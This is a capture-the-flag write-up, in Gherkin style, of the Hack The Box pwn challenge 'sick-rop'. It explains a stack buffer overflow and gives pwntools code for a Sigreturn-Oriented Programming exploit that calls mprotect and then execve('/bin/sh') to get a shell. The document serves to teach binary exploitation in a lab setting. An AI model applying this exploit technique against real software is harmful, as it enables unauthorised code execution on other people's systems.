## Version 2.0
## language: en

Feature: sick-rop
  Site:
    Hackthebox
  Category:
    Pwn
  User:
    lkkpp
  Goal:
    Get shell and read the flag

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | Python          | 3.6       |
    | VMware          | 15.5.6    |
    | Python          | 3.6.9     |
    | Ropper          | 1.13.5    |
    | IDA             | 7.2       |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its section
    When I open the challenge section
    Then I see a the following description
    """
    You might need some syscalls.
    """
    And it is possible to download the challenge

  Scenario: Sucess:Analyze the binary and finding bugs
    Given the source code is not provided
    When I downloaded the binary
    And I get information from the challenge
    """
    $ file space
    sick_rop: ELF 64-bit LSB executable,
    x86-64, version 1 (SYSV), statically linked, not stripped
    """
    Then I analyze it with IDA [evidences](ida.png)
    """
    0x000000000040104F public _start
    0x000000000040104F _start proc near
    0x000000000040104F call    vuln
    0x0000000000401054 jmp     short _start
    0x0000000000401054 _start endp
    """
    And there is a function called "vuln" that contains a Stack Buffer Overflow
    """
    0x000000000040102E push    rbp
    0x000000000040102F mov     rbp, rsp
    0x0000000000401032 sub     rsp, 20h
    0x0000000000401036 mov     r10, rsp
    0x0000000000401039 push    300h
    0x000000000040103E push    r10
    0x0000000000401040 call    read
    0x0000000000401045 push    rax
    0x0000000000401046 push    r10
    0x0000000000401048 call    write
    0x000000000040104D leave
    0x000000000040104E retn
    """ [evidences](bufferoverflow.png)
    When I analyze this, triggering the vulnerability is very simple
    And this is because read() reads 0x300 bytes from STDIN
    Then vuln function copies the bytes to a 0x20 stack buffer

  Scenario: Fail: Exploiting the Stack Buffer Overflow to get shell with ROP
    Given I recognize the vulnerability
    When I check the binary protections [evidences](noprotections.png)
    """
    pwndbg> checksec
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    """
    And I realize that the binary only have NX enabled
    When I think of a traditional way to exploit it (ROP for example)
    And I look for gadgets with ropper
    """
    pwndbg> ropper
    0x000000000040104c: dec ecx; ret;
    0x000000000040100c: je 0x1032; or byte ptr [rax - 0x75], cl; push rsp;
    0x000000000040100c: je 0x1032; or byte ptr [rax - 0x75], cl; push rsp;
    0x0000000000401023: je 0x1049; or byte ptr [rax - 0x75], cl; push rsp;
    0x0000000000401023: je 0x1049; or byte ptr [rax - 0x75], cl; push rsp;
    0x0000000000401041: mov ebx, 0x50ffffff; push r10; call 0x1017; leave; ret;
    0x0000000000401010: mov edx, dword ptr [rsp + 0x10]; syscall;
    0x0000000000401010: mov edx, dword ptr [rsp + 0x10]; syscall; ret;
    0x000000000040100f: mov rdx, qword ptr [rsp + 0x10]; syscall;
    0x000000000040100f: mov rdx, qword ptr [rsp + 0x10]; syscall; ret;
    0x0000000000401046: push r10; call 0x1017; leave; ret;
    0x0000000000401045: push rax; push r10; call 0x1017; leave; ret;
    0x0000000000401047: push rdx; call 0x1017; leave; ret;
    0x0000000000401011: push rsp; and al, 0x10; syscall;
    0x0000000000401011: push rsp; and al, 0x10; syscall; ret;
    0x0000000000401049: retf 0xffff; dec ecx; ret;
    0x000000000040104d: leave; ret;
    0x0000000000401016: ret;
    0x0000000000401014: syscall;
    0x0000000000401014: syscall; ret;
    """
    And I see that there is no gadget to control the registers like "pop rdi"
    Then I need to find another way since classic ROP is not possible

  Scenario: Success: Exploiting the binary with SROP
    Given I recognize the bug and due to limitations in gadgets
    When the idea is to perform a SROP (Sigreturn Oriented Programming)
    And it basically consists of "rt_sigreturn" syscall
    And the "ucontext_t" struct
    """
    // defined in /usr/include/sys/ucontext.h
    /* Userlevel context.  */

    typedef struct ucontext_t
    {
        unsigned long int uc_flags;
        struct ucontext_t *uc_link;
        stack_t uc_stack;           // the stack used by this context
        mcontext_t uc_mcontext;     // the saved context
        sigset_t uc_sigmask;
        struct _libc_fpstate __fpregs_mem;
    } ucontext_t;

    // defined in /usr/include/bits/types/stack_t.h
    /* Structure describing a signal stack.  */

    typedef struct
    {
        void *ss_sp;
        size_t ss_size;
        int ss_flags;
    } stack_t;

    // difined in /usr/include/bits/sigcontext.h
    struct sigcontext
    {
        __uint64_t r8;
        __uint64_t r9;
        __uint64_t r10;
        __uint64_t r11;
        __uint64_t r12;
        __uint64_t r13;
        __uint64_t r14;
        __uint64_t r15;
        __uint64_t rdi;
        __uint64_t rsi;
        __uint64_t rbp;
        __uint64_t rbx;
        __uint64_t rdx;
        __uint64_t rax;
        __uint64_t rcx;
        __uint64_t rsp;
        __uint64_t rip;
        __uint64_t eflags;
        unsigned short cs;
        unsigned short gs;
        unsigned short fs;
        unsigned short ss;
        __uint64_t err;
        __uint64_t trapno;
        __uint64_t oldmask;
        __uint64_t cr2;
        __extension__ union
        {
            struct _fpstate * fpstate;
            __uint64_t __fpstate_word;
        };
        __uint64_t __reserved1 [8];
    };
    """
    When a user process starts a signal, control is changed to the kernel
    And the kernel saves the process context on the user stack
    Then pushes the rt_sigreturn address onto the stack
    And jumps to userland to execute the signal handler, that is, rt_sigreturn
    Then after rt_sigreturn is executed, jump to the kernel
    Then The kernel restores the process context saved
    And the control is transferred to userland
    Then knowing this, my idea is to create a fake ucontext_t struct
    And I used Python and the pwnlib library for this
    """
    payload = b''
    payload += b'A' * 32
    payload += b'B' * 8 # rbp
    payload += p64(0x000000000040102E) # rip
    payload += p64(0x0000000000401014) # syscall

    frame = SigreturnFrame()
    frame.rax = 10 # mprotect
    frame.rdi = 0x401000
    frame.rsi = 0x1000 # buf
    frame.rdx = 7 # count
    frame.rip = 0x0000000000401014 # syscall
    frame.rsp = 0x400000 + 4312 # _start
    """
    And explaining a little what I do is call mprotect
    When I modify a section of memory to executable (0x401000)
    And I continue with the execution to call execve('/bin/sh', NULL, NULL)
    """
    frame = SigreturnFrame()
    frame.rax = 59 # execve
    frame.rdi = 0x4011e8
    frame.rsi = 0x401000 + 0x600 # buf
    frame.rdx = 0x401000 + 0x600 # count
    frame.rsp = 0
    frame.rip = 0x0000000000401014 # syscall

    payload += bytes(frame)

    payload += b'/bin/sh\x00'
    """
    Then this way I managed to exploit the binary [evidences](pwned.png)
